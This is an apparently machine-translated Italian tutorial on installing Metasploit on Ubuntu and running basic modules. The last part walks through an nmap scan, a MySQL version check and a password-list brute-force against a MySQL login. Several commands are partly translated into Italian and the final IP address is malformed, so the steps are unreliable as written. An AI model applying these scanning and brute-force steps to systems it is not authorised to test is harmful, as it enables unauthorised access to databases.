Sommario
Metasploit Framework, è un strumento per sviluppare ed eseguire exploit contro un computer o un server. Metasploit Framework è stato scritto in linguaggio Ruby, è multipiattaforma e richiede un computer potente per funzionare, esiste una versione a pagamento e una versione gratuita per la community.Può essere scaricato da www.metasploit.com/framework/download
Stiamo per installare in Linux Ubuntu, ma funziona per altre distro modificando alcuni comandi.
Accediamo alla finestra del terminale e installiamo ruby, prima che funzionasse con perl ma era programmato completamente nuovo.
Installiamo le dipendenze ruby in modo da poter poi eseguire il framework.
sudo apt-get install ruby libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get install libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby
Quindi a seconda della versione che scarichiamo a 32 o 64 bit dal termink daremo il permesso:
chmod + x metasploit-latest-linux-x64-installer.run
Eseguiamo il programma di installazione e si aprirà la finestra di installazione:
sudo metasploit-latest-linux-x64-installer.run
Faremo clic sul seguente Fordward), definiamo se verrà installato come servizio e la porta che occuperà, per impostazione predefinita utilizza il 3790.
Al termine dell'installazione dalla finestra del terminale e con accesso root aggiorniamo il framework
con il comando:
msfupdate
Metasploit è un programma senza ambiente grafico che gira completamente nel terminale. Accediamo al software da terminale con il comando:
msfconsole
Conoscere MSF internamente
MSF (Metasploit Framework) È strutturato in una serie di moduli quali:
exploit Quali sono gli script e i programmi disponibili in MSF e che possiamo utilizzare, sono organizzati per sistema operativo e categorie, ad esempio exploit / windows / browser / quali sono gli exploit disponibili per i browser che girano su Windows.
Payload: È l'azione che verrà svolta se la vulnerabilità che stiamo testando può essere trovata e sfruttata.
Ausiliario: gli script ausiliari con funzioni diverse, come ausiliario/scanner/portscan/tcp e utilizzando questo scanner di porte tcp, otterremmo lo stato della porta. Questo script è un'alternativa a Nmap.
Encoder: Stanno codificando script per eludere alcuni antivirus e antispammer.
Iniziamo un esempio di test, da terminale eseguiamo:./msfconsole
Il prompt di Metsploit è msf> da lì eseguiremo tutto e per uscire digiteremo semplicemente exit
Inizieremo scansionando un IP con nmap
msf> nmap -sV 190.155.80.110
Attiviamo il modulo ausiliario per accedere agli strumenti di script che permetteranno di lavorare su mysql. Possiamo anche vedere la versione del modulo.
Scansioniamo la versione di mysql, per ovvie ragioni l'ip è fittizio e solo per l'esempio:
msf> ausiliario (versione_mysql)> imposta RHOSTS 190.155.80.110 // imposta l'ip remoto msf> imposta RHOSTS 192.155.80.110 msf> ausiliario (versione_mysql)> esegui // controlla la versione di mysql
Se viene eseguito correttamente può restituire la versione di mysql:
[*] 190.155.80.110 esegue Mysql5.0
Un altro caso con il modulo di scansione e il tentativo di cambiare l'utente root di mysql:
msf> usa scanner / mysql / mysql_login msf> set USERNAME admin msf> set PASS_FILE /tmp/keys.lst // file di testo con possibili chiavi una sotto l'altra msf> exploit
Se funziona possiamo accedere a mysql:
mysql -h 1920,155,80,110 -u admin -pkey